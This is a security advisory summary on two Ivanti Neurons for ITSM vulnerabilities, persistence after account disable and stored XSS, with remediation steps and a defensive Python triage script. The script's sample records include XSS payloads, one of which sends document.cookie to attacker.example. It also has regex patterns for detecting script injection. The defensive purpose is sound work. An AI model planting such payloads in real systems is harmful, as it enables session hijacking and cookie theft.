Ivanti Neurons for ITSM Vulnerabilities Allow Remote Attacker to Obtain User Sessions


What happened

Ivanti released security updates for two vulnerabilities in Ivanti Neurons for ITSM that could allow a remote authenticated attacker to keep access that should have been revoked, or to obtain information from other users' sessions. The first flaw, CVE-2026-4913, is an improper path protection issue affecting Ivanti Neurons for ITSM versions prior to 2025.4; it could allow a remote authenticated attacker to keep using their access even after an administrator disables the account. The second flaw, CVE-2026-4914, is a stored cross-site scripting vulnerability that lets a remote authenticated attacker inject script into stored content, where it executes in the browser sessions of other users who view that content. Ivanti said both issues are fixed in version 2025.4 and that it was not aware of any active exploitation at the time of disclosure.

Who is affected

The direct exposure covers organizations running Ivanti Neurons for ITSM version 2025.3 or any earlier release, in both on-premises and cloud deployments. Ivanti said cloud customers need take no action because the fixes were applied to all cloud environments on December 12, 2025; on-premises customers must upgrade to version 2025.4 themselves.

Why CISOs should care

This matters because both flaws undermine access control and session security in an IT service management platform that holds sensitive operational data and drives privileged workflows. CVE-2026-4913 means disabling an account may not actually end that user's access, which silently defeats offboarding and incident-response containment. CVE-2026-4914 means content an authenticated user stores in the platform can run script in the sessions of other users who later view it, exposing whatever those sessions can see or do.

3 practical actions

Upgrade on-premises deployments: Move Ivanti Neurons for ITSM on-premises environments to version 2025.4 as soon as possible; any release at or below 2025.3 is affected.

Review disabled-account controls: For users disabled or offboarded before the upgrade, confirm in audit logs that no activity occurred after the disable time, and verify that their sessions, tokens and other access paths are actually closed rather than assuming the disable took effect.

Watch for malicious stored content: Review user-supplied content stored in the platform for HTML or script fragments that could execute when another user views the record, and treat any such content created before the upgrade as a possible attempt to hijack other users' sessions.
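The three actions above can be backed by a small triage script. The following is an added example for this page, not Ivanti code and not an Ivanti API: the version-string format, the audit-event tuples and the exported-record tuples are assumed shapes, and the sample records and events are constructed for illustration. It checks a version string against the 2025.4 fix, flags audit activity by an account after its disable time, and flags stored text that carries common script-execution vectors.

```python
"""Triage helpers for the Ivanti Neurons for ITSM advisory above.

Added example, not Ivanti's code. Record and audit-event shapes are
assumptions; a real run would adapt them to the platform's own exports.
"""
import re
from datetime import datetime

FIXED_VERSION = (2025, 4)  # advisory: fixed in 2025.4, 2025.3 and earlier affected


def parse_version(version: str) -> tuple:
    """'2025.3' -> (2025, 3); extra components such as '2025.3.1' are ignored."""
    parts = version.strip().split(".")
    return tuple(int(p) for p in parts[:2])


def is_vulnerable_version(version: str) -> bool:
    """True for any release prior to 2025.4."""
    return parse_version(version) < FIXED_VERSION


def activity_after_disable(disabled_at: dict, activity: list) -> list:
    """Return audit events by an account that occurred after it was disabled.

    disabled_at: {user: ISO 8601 timestamp of the disable action}
    activity:    [(user, ISO 8601 timestamp, action), ...]
    Both are assumed shapes, not an Ivanti log format.
    """
    cutoffs = {u: datetime.fromisoformat(t) for u, t in disabled_at.items()}
    hits = []
    for user, ts, action in activity:
        cutoff = cutoffs.get(user)
        if cutoff is not None and datetime.fromisoformat(ts) > cutoff:
            hits.append((user, ts, action))
    return hits


# Patterns for script-execution vectors in stored HTML/text. Heuristic:
# anything flagged needs a human look, and absence of a hit is not proof of safety.
SCRIPT_VECTORS = [
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"<[^>]*\son[a-z]+\s*=", re.I), "inline event handler"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URI"),
    (re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I), "active embed element"),
    (re.compile(r"srcdoc\s*=", re.I), "iframe srcdoc"),
]


def scan_stored_content(records: list) -> list:
    """records: [(record_id, field_name, text), ...] (assumed export shape).

    Returns (record_id, field_name, vector_label) for every vector found.
    """
    findings = []
    for rid, field, text in records:
        for pattern, label in SCRIPT_VECTORS:
            if pattern.search(text or ""):
                findings.append((rid, field, label))
    return findings


# Constructed sample data for the example; not real tenant data.
SAMPLE_DISABLED = {"jdoe": "2025-12-10T09:00:00+00:00"}
SAMPLE_ACTIVITY = [
    ("jdoe", "2025-12-10T08:30:00+00:00", "ticket.view"),
    ("jdoe", "2025-12-10T11:15:00+00:00", "ticket.update"),  # after disable
    ("asmith", "2025-12-10T11:20:00+00:00", "ticket.view"),
]
SAMPLE_RECORDS = [
    ("INC-1001", "description", "Printer on floor 3 is offline"),
    ("INC-1002", "description",
     "Login fails <script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
    ("KB-77", "body", "<img src=x onerror=alert(document.domain)>"),
    ("INC-1003", "resolution", "Reset password; see <a href='javascript:alert(1)'>link</a>"),
]


if __name__ == "__main__":
    print("2025.3 vulnerable:", is_vulnerable_version("2025.3"))
    print("2025.4 vulnerable:", is_vulnerable_version("2025.4"))
    for hit in activity_after_disable(SAMPLE_DISABLED, SAMPLE_ACTIVITY):
        print("post-disable activity:", hit)
    for finding in scan_stored_content(SAMPLE_RECORDS):
        print("stored script vector:", finding)
```

The pattern list is deliberately conservative: it is meant to produce a short list of records for a human to open, not to prove content safe, and a record that trips none of the patterns has not been cleared.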
